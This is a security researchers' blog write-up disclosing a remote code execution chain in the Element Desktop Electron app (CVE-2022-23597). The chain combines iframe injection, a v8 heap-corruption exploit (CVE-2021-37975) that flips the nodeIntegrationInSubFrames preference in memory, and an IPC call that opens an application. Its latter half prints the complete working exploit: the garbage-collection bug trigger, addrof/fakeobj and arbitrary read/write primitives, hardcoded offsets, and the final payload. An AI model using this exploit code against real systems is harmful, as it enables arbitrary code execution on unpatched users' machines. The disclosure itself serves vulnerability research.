Remote Code Execution on Element Desktop Application using Node Integration in Sub Frames Bypass - CVE-2022-23597

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– by s1r1us and TheGrandPew

pew 1: element

During our Electron Desktop Application hacking frenzy, Pew informed me on Discord about a Desktop Application called Element in which he was able to insert an external iframe. We began examining the Element source code, which is public here, and eventually succeeded in Remote Code Execution.

Let’s dig into the details of the bug right away!

Bug #1: IFrame Injection

This is rather a feature than a bug, Element supports jitsi for conference calls, which provides options for self-hosting your own server. According to docs, conferenceDomain query parameter can be provided to embed an self-hosting conference server. Furthermore, the doc says The url is typically something we shove into an iframe with "sandboxing". As, it was “sandboxed” it won’t be an issue right? right?

PoC for Iframe Injection

The following URL can be used to embed an external site named
Desktop Application PoC:

By using the above PoC, we can get JavaScript Execution on the Desktop App. The issue is Element Desktop Applicaiton fully enables sandbox. As you can noticed in the below script sandbox is enabled via app.enableSandbox(), also note that nodeIntegrationInSubFrames is not explicitly enabled which is disabled by default.

 1    app.enableSandbox();
 2    global.mainWindow = new BrowserWindow({
 3      [...]
 4        webPreferences: {
 5            preload: preloadScript,
 6            nodeIntegration: false,
 7            //sandbox: true, // We enable sandboxing from app.enableSandbox() above
 8            contextIsolation: true,
 9            webgl: true,
10        },

This situation is different from previous Discord bug where sandbox is not fully enabled. There are few things we can look for, if sandbox is disabled on main window.

  1. Check if there are any new-window or navigation misconfiguration similar to Discord bug.
  2. Check if there are any postMessage issues on main frame.
  3. Find a XSS on subdomain of the parent window( To perform same-origin spoofing similar to the challenge I gave in BSides Ahmedabad CTF.
  4. Finally, we can look for sensitive ipcMain handlers on main window which can be reached through CVE-2022-29247 we reported to Electron

Now, the only option we have is four as the app is fully sandboxed.

Bug? #2: Finding Remote Code Execution Sinks on Desktop App

After grepping for ipcMain.on and ipcMain.handle we came across to an interesting IPC handler defined to open user Downloaded files.

2ipcMain.on('userDownloadOpen', function(ev: IpcMainEvent, { path }) {
3    shell.openPath(path);

And, this is exposed to Main Window parent frame using preload scripts contextBridge as below.

 2    "electron",
 3    {
 4        on(channel: string, listener: (event: IpcRendererEvent, ...args: any[]) => void): void {
 5            if (!CHANNELS.includes(channel)) {
 6                console.error(`Unknown IPC channel ${channel} ignored`);
 7                return;
 8            }
 9            ipcRenderer.on(channel, listener);
10        },
11        send(channel: string, ...args: any[]): void {
12            if (!CHANNELS.includes(channel)) {
13                console.error(`Unknown IPC channel ${channel} ignored`);
14                return;
15            }
16            ipcRenderer.send(channel, ...args);
17        },
18    },

So, by sending an following IPC from the main frame, we can achieve Remote Code Execution on Element Desktop.


Now, Let’s consider our options on how to get access to electron.send from the iframe which we have XSS on.

  1. Get an XSS on Main window and access electron.send directly.
  2. Use CVE-2022-29247 nodeIntegrationInSubFrames and get access to electron.send in our iframe.

We audited Main Window JavaScript for XSS sinks, we couldn’t find anything interesting. So, we decided to use second option which seems to be easily achieved as the Element Desktop is using an old version of Electron.

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Element/1.9.5 Chrome/91.0.4472.164 Electron/13.5.1 Safari/537.36

What is nodeIntegrationInSubFrames?

It is important to understand what nodeIntegrationSubFrames is clearly, from the official Electron Documentation the nodeIntegrationInSubFrames webPreference is defined as follows.

nodeIntegrationInSubFrames: Experimental option for enabling Node.js support in sub-frames such as iframes and child windows. All your preloads will load for every iframe, you can use process.isMainFrame to determine if you are in the main frame or not.

The important thing to note in the above statement for our exploit is that the nodeIntegrationSubFrames enables preloads in iframes, in other words it exposes contextBridge APIs to the iframes and child windows. Which is what we exactly wanted to get access to electron.send exposed by the Element Desktop Main window preload JS.

The situation we have can be described with the below picture.

Node Integration in Sub Frames

As you, can see our frame doesn’t have access to electron.send API.

Bug 3: Renderer Exploit to Enable nodeIntegrationInSubFrames CVE-2022-29247

Electron adds Electron-specific WebPreferences such as node_integration, context_isolation and node_integration_in_subframes by patching the blink WebPreferences. These preferences then later used to check if the specific RenderFrame(a web frame) has access to Electron specific features such Node APIs, preload scripts, contextBridge and so on.

 1--- a/third_party/blink/common/web_preferences/
 2+++ b/third_party/blink/common/web_preferences/
 3@@ -142,6 +142,19 @@ WebPreferences::WebPreferences()
 4       fake_no_alloc_direct_call_for_testing_enabled(false),
 5       v8_cache_options(blink::mojom::V8CacheOptions::kDefault),
 6       record_whole_document(false),
 7+      // Begin Electron-specific WebPreferences.
 8+      context_isolation(false),
 9+      is_webview(false),
10+      hidden_page(false),
11+      offscreen(false),
12+      node_integration(false),
13+      node_integration_in_worker(false),
14+      node_integration_in_sub_frames(false),
15+      enable_spellcheck(false),
16+      enable_plugins(false),
17+      enable_websql(false),
18+      webview_tag(false),
19+      // End Electron-specific WebPreferences.
20       cookie_enabled(true),
21       accelerated_video_decode_enabled(false),
22       animation_policy(

Let’s just concentrate on node_integration_in_sub_frames which is needed for our Element RCE, the other WebPreferences exploitations will be described in coming blogs.

The decision to either allow preloads in child frames(RenderFrames) takes place in ElectronRenderFrameObserver:DidInstallConditionalFeatures which is done in the same Renderer process instead of the Browser process.

 1void ElectronSandboxedRendererClient::DidCreateScriptContext(
 2    v8::Handle<v8::Context> context,
 3    content::RenderFrame* render_frame) {
 4  RendererClientBase::DidCreateScriptContext(context, render_frame);
 6  // Only allow preload for the main frame or
 7  // For devtools we still want to run the preload_bundle script
 8  // Or when nodeSupport is explicitly enabled in sub frames
 9  bool is_main_frame = render_frame->IsMainFrame();
10  bool is_devtools =
11      IsDevTools(render_frame) || IsDevToolsExtension(render_frame);
12  bool allow_node_in_sub_frames =
13      render_frame->GetBlinkPreferences().node_integration_in_sub_frames;
14  bool should_load_preload =
15      (is_main_frame || is_devtools || allow_node_in_sub_frames) &&
16      !IsWebViewFrame(context, render_frame);
17  if (!should_load_preload)
18    return;
20  injected_frames_.insert(render_frame);

As the check is done in the renderer process, using a renderer exploit the setting can be flipped which effectively enables nodeIntegrationInSubFrames.

The only thing which is left is to write an exploit which flips the render_frame->GetBlinkPreferences().node_integration_in_sub_frames somehow which is the hardest part for me.

Exploit Development with v8 exploit CVE-2021-37975

I decided to use CVE-2021-37975 to exploit the issue. Having not so much experience in exploit development, this was the very tiring and interesting part for me. Fun fact, I didn’t know nothing about v8 binary exploitation before our research and somehow was able to learn basic v8 exploitation thanks to my CTF mate ptr-yudai 😌. Even though, we usually use an public v8 exploit its not as easy as running it and popping the calculator. The hardest part I faced during this exploit writing is finding render_frame_ offset from window object as it was not stable usually because of using hardcoded offsets dumbly. I used to spend days in lldb to understand the v8 bug and find offsets to blink WebPreferences, but the popping calculator in the end made it worth doing.

Anywho, after trying for 2 days I was able to pull off full exploit. The following snippet shows the offset to render_frame->GetBlinkPreferences().node_integration_in_sub_frames. You can find the full exploit in the end of the writeup.

 1    var win = addrof(window);
 2    console.log("[+] win address : " + win.hex());
 4    var addr1 = half_read(win + 0x18n);
 5    console.log("[+] win + 0x18 : " + addr1.hex());
 7    var addr2 = full_read(addr1 + 0xf8n);
 8    console.log("[+] add2: " + addr2.hex());
10    var web_pref = addr2 + 0x50008n;
11    var preload = full_read(web_pref + 0x1a0n);
12    console.log("[+] web_pref addr: " + web_pref.hex());
15    var nisf = web_pref  + 0x1acn;
16    var nisf_val = full_read(nisf);
17    console.log("[+] nisf val = "+ nisf_val.hex());
18    var overwrite = nisf_val | 0x0000000000000001n //overwrite
19    full_write(nisf, overwrite);
20    var nisf_val = full_read(nisf);
21    console.log("[+] nisf val overwritten = "+ nisf_val.hex());

And finally, after enabling the nodeIntegrationInSubFrames we just need to create a same-origin RenderFrame which will have access to electron.send 🔥.

1    frame = document.createElement("iframe")
2    frame.srcdoc="<script>electron.send('userDownloadOpen',{path:'/System/Applications/'})<\/script>";
3    document.body.appendChild(frame)


The final exploit looks like as below.


Here is the nice PoC which pop the calculator.

“Want to secure your electron or JS Application. Reach out us at or visit to learn more”

Here is the full exploit to get RCE on Element.

  4<button onclick=pwn() >click me to pwn </button>
  6    function sleep(miliseconds) {
  7   var currentTime = new Date().getTime();
  8   while (currentTime + miliseconds >= new Date().getTime()) {
  9   }
 12var initKey = {init : 1};
 13var level = 4;
 14var map1 = new WeakMap();
 15var gcSize = 0x4fe00000;
 16var sprayParam = 100;
 18var dbl = [1.1,1.1,1.1,1.1];
 19// %DebugPrint(dbl);
 21//Get mapAddr using DebugPrint for double array (the compressed address of the map)
 22// var mapAddr = 0x824a8e1;
 23// var mapAddr = 0x82830e1
 24var mapAddr = 0x83430e1
 26var rwxOffset = 0x60;
 28var code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
 29var module = new WebAssembly.Module(code);
 30var instance = new WebAssembly.Instance(module);
 31var wasmMain = instance.exports.main;
 32// %DebugPrint(instance);
 33//Return values should be deleted/out of scope when gc happen, so they are not directly reachable in gc
 34function hideWeakMap(map, level, initKey) {
 35  let prevMap = map;
 36  let prevKey = initKey;
 37  for (let i = 0; i < level; i++) {
 38    let thisMap = new WeakMap();
 39    prevMap.set(prevKey, thisMap);
 40    let thisKey = {'h' : i};
 41    //make thisKey reachable via prevKey
 42    thisMap.set(prevKey, thisKey);
 43    prevMap = thisMap;
 44    prevKey = thisKey;
 45    if (i == level - 1) {
 46      let retMap = new WeakMap();
 47      map.set(thisKey, retMap);
 48      return thisKey;
 49    }
 50  }
 52//Get the key for the hidden map, the return key is reachable as strong ref via weak maps, but should not be directly reachable when gc happens
 53function getHiddenKey(map, level, initKey) {
 54  let prevMap = map;
 55  let prevKey = initKey;
 56  for (let i = 0; i < level; i++) {
 57    let thisMap = prevMap.get(prevKey);
 58    let thisKey = thisMap.get(prevKey);
 59    prevMap = thisMap;
 60    prevKey = thisKey;
 61    if (i == level - 1) {
 62      return thisKey;
 63    }
 64  }
 67function setUpWeakMap(map) {
 68//  for (let i = 0; i < 1000; i++) new Array(300);
 69  //Create deep enough weak ref trees to hiddenMap so it doesn't get discovered by concurrent marking
 70  let hk = hideWeakMap(map, level, initKey);
 71//Round 1 maps
 72  let hiddenMap = map.get(hk);
 73  let map7 = new WeakMap();
 74  let map8 = new WeakMap();
 76//hk->k5, k5: discover->wl
 77  let k5 = {k5 : 1};
 78  let map5 = new WeakMap();
 79  let k7 = {k7 : 1};
 80  let k9 = {k9 : 1};
 81  let k8 = {k8 : 1};
 82  let ta = new Uint8Array(1024);
 83  ta.fill(0xfe);
 84  let larr = new Array(1 << 15);
 85  larr.fill(1.1);
 86  let v9 = {ta : ta, larr : larr};
 87  map.set(k7, map7);
 88  map.set(k9, v9);
 90//map3 : kb|vb: initial discovery ->wl
 91  hiddenMap.set(k5, map5);
 92  hiddenMap.set(hk, k5);
 94//iter2: wl: discover map5, mark v6 (->k5) black, discovery: k5 black -> wl
 95//iter3: wl: map5 : mark map7, k7, no discovery, iter end
 96  map5.set(hk, k7);
 98//Round 2: map5 becomes kb in current, initial state: k7, map7 (black), goes into wl
101//wl discovers map8, and mark k8 black
102  map7.set(k8, map8);
103  map7.set(k7, k8);
105//discovery moves k8, map8 into wl
106//iter2 marks k9 black, iter finished
107  map8.set(k8,k9);
112var conversion_buffer = new ArrayBuffer(8);
113var float_view = new Float64Array(conversion_buffer);
114var int_view = new BigUint64Array(conversion_buffer);
115BigInt.prototype.hex = function() {
116    return '0x' + this.toString(16);
118BigInt.prototype.i2f = function() {
119    int_view[0] = this;
120    return float_view[0];
122Number.prototype.f2i = function() {
123    float_view[0] = this;
124    return int_view[0];
129var view = new ArrayBuffer(24);
130var dblArr = new Float64Array(view);
131var intView = new Int32Array(view);
132var bigIntView = new BigInt64Array(view);
134function ftoi32(f) {
135  dblArr[0] = f;
136  return [intView[0], intView[1]];
139function i32tof(i1, i2) {
140  intView[0] = i1;
141  intView[1] = i2;
142  return dblArr[0];
145function itof(i) {
146  bigIntView = BigInt(i);
147  return dblArr[0];
150function ftoi(f) {
151  dblArr[0] = f;
152  return bigIntView[0];
155BigInt.prototype.hex = function() {
156  return '0x' + this.toString(16);
159Number.prototype.hex = function() {
160  return '0x' + this.toString(16);
163function gc() {
164  //trigger major GC: See (Trick #2: Triggering Major GC without spraying the heap)
165  new ArrayBuffer(gcSize);
169function restart() {
170  //Should deopt main if it gets optimized
171  global.__proto__ = {};
172  gc();
173  sleep(2000);
174  pwn();
177function pwn() {
178	setUpWeakMap(map1);
179	gc();
181	let objArr = [];
183	for (let i = 0; i < sprayParam; i++) {
184	  let thisArr = new Array(1 << 15);
185	  objArr.push(thisArr);
186	}
187	//These are there to stop main being optimized by JIT
188    globalIdx['a' + globalIdx] = 1;
189    //Can't refactor this, looks like it cause some double rounding problem (got optimized?)
190	for (let i = 0; i < objArr.length; i++) {
191	  let thisArr = objArr[i];
192	  thisArr.fill(instance);
193	}
194    globalIdx['a' + globalIdx + 1000] = 1;
195    let result = null;
196	try {
197      result = fetch();
198    } catch (e) {
199      console.log("fetch failed");
200      restart();
201      return;
202    }
203    if (!result) {
204	  console.log("fail to find object address.");
205      restart();
206      return;
207    }
208    let larr = result.larr;
209    let index = result.idx;
211    let instanceAddr = ftoi32(larr[index])[0];
212    let instanceFloatAddr = larr[index];
213    console.log("found instance address: 0x" + instanceAddr.toString(16) + " at index: " + index);
214    let x = {};
215    for (let i = 0; i < objArr.length; i++) {
216      let thisArr = objArr[i];
217      thisArr.fill(x);
218    }
220    globalIdx['a' + globalIdx + 5000] = 1;
222    larr[index] = instanceFloatAddr;
223    let objArrIdx = -1;
224    let thisArrIdx = -1;
225    for (let i = 0; i < objArr.length; i++) {
226      globalIdx['a' + globalIdx + 3000] = 1;
227	  global.__proto__ = {};
228      let thisArr = objArr[i];
229      for (let j = 0; j < thisArr.length; j++) {
230        let thisObj = thisArr[j];
231        if (thisObj == instance) {
232          console.log("found window object at: " + i + " index: " + j);
233          objArrIdx = i;
234          thisArrIdx = j;
235        }
236      }
237    }
238    globalIdx['a' + globalIdx + 4000] = 1;
239    if (objArrIdx == -1) {
240      console.log("failed getting fake object index.");
241      restart();
242      return;
243    }
244    let obj_arr = objArr[objArrIdx];
245    let double_arr = larr;
247    //%DebugPrint(objArr[objArrIdx][thisArrIdx]);
249    function addrof(obj){
251      obj_arr.fill(obj);  
252      return (double_arr[index].f2i() & 0xffffffffn) - 1n;
254    }
256    function fakeobj(addr){
257      globalIdx['a' + globalIdx + 2001] = 1;
259      larr[index] =  addr 
260      return objArr[objArrIdx][thisArrIdx];
262    }
264    globalIdx['a' + globalIdx + 2000] = 1;
267    // Fake map
268    let addr_proto = addrof(Array.prototype);
269    console.log("[+] addr_proto = " + addr_proto.hex());
270    let fake_map = [
271          0x1604040408042119n.i2f(),
272          0x0a0004002100043dn.i2f(),
273          (addr_proto | 1n).i2f()
274    ];
276    //%DebugPrint(fake_map);
277    let addr_map = addrof(fake_map) + 0x74n;
278    if((addr_map%8n)!=0)
279      addr_map -= 4n //for some reason it should %8 = 0
280    console.log("[+] fake map: " + addr_map.hex());
282    let obj = [1.1,1.1,1.1];
283    //%DebugPrint(obj);
285    let addr  = Number(addrof(obj)) | 1 ;
287    let objEleAddr = addr + 0x18 + 0x8 ;
288    let floatAddr = i32tof(objEleAddr, objEleAddr);
289    let floatMapAddr = i32tof(Number(addr_map) | 1, Number(addr_map) | 1);
290    //Faking an array at using obj[0] and obj[1]
291    obj[0]  = floatMapAddr;
292    // let eleLength = i32tof(instanceAddr + rwxOffset, 10);
293    //fake object at element of obj
294    larr[index] = floatAddr;
295    let fakeArray = objArr[objArrIdx][thisArrIdx];
297    function half_read(addr){
298      // let element = i32tof(addr-8, 10);//-8 exact addr
299      let element = (0x888800000001n | (addr-8n)).i2f();
300      obj[1] = element;
301      return fakeArray[0].f2i();
303    }
304    function half_write(addr, value){
306      // let element  = i32tof(addr-8, 10);
307      let element = (0x888800000001n | (addr-8n)).i2f();
308      obj[1] = element;
309      fakeArray[0] = value.i2f();
310    }
312    //full read write
313    let evil = new Float64Array(0x10);
314    let addr_evil = addrof(evil);
315    console.log("[+] addr_evil = " + addr_evil.hex());
316    let orig_evil = half_read(addr_evil + 0x28n);
317    console.log("[+] backing store of typed array: " + orig_evil.hex());
318    function full_read(addr) {
319        half_write(addr_evil + 0x28n, addr);
320        return evil[0].f2i();
321    }
322    function full_write(addr, value) {
323        half_write(addr_evil + 0x28n, addr);
324        evil[0] = value.i2f();
325    }
326    function full_cleanup() {
327        half_write(addr_evil + 0x28n, orig_evil);
328    }
330    var win = addrof(window);
331    console.log("[+] win address : " + win.hex());
333    var addr1 = half_read(win + 0x18n);
334    console.log("[+] win + 0x18 : " + addr1.hex());
336    var addr2 = full_read(addr1 + 0xf8n);
337    console.log("[+] add2: " + addr2.hex());
339    var web_pref = addr2 + 0x50008n;
340    var preload = full_read(web_pref + 0x1a0n);
341    console.log("[+] web_pref addr: " + web_pref.hex());
343    console.log("[+] preload addr: " + preload.hex());
345    var ciso = web_pref + 0x184n
346    var nisf = web_pref  + 0x1acn;
347    var nisf_val = full_read(nisf);
348    console.log("[+] nisf val = "+ nisf_val.hex());
349    var overwrite = nisf_val | 0x0000000000000001n
350    full_write(nisf, overwrite);
351    var nisf_val = full_read(nisf);
352    console.log("[+] nisf val overwritten = "+ nisf_val.hex());
354    // var ciso_val = full_read(ciso);
355    // console.log("[+] ciso val = "+ ciso_val.hex());
356    // var overwrite = ciso_val  &  (0xffffffffffffff00n);
357    // full_write(ciso, overwrite);
358    // var nisf_val = full_read(ciso);
359    // console.log("[+] ciso val overwritten = "+ ciso_val.hex());
364    frame = document.createElement("iframe")
365    frame.srcdoc="<script>electron.send('userDownloadOpen',{path:'/System/Applications/'})<\/script>";
366    document.body.appendChild(frame)
370function findTA(ta) {
371    let found = false;
372    for (let i = 0; i < 16; i++) {
373      if (ta[i] != 0xfe) {
374          console.log(ta[i]);
375          return true;
376      }
377    }
378    console.log(ta[0]);
379    return found;
382function findLArr(larr) {
383    for (let i = 0; i < (1 << 15); i++) {
384        if (larr[i] != 1.1) {
385          let addr = ftoi32(larr[i]);
386          return i;
387        }
388	}
389	return -1;
392function fetch() {
393	let hiddenKey = getHiddenKey(map1, level, initKey);
394	let hiddenMap = map1.get(hiddenKey);
395	let k7 = hiddenMap.get(hiddenMap.get(hiddenKey)).get(hiddenKey);
396	let k8 = map1.get(k7).get(k7);
397	let map8 = map1.get(k7).get(k8);
399	let larr = map1.get(map8.get(k8)).larr;
400    let index = findLArr(larr);
401	if (index == -1) {
402	  return;
403	}
404    return {larr : larr, idx : index};
406global = {};
407globalIdx = 0;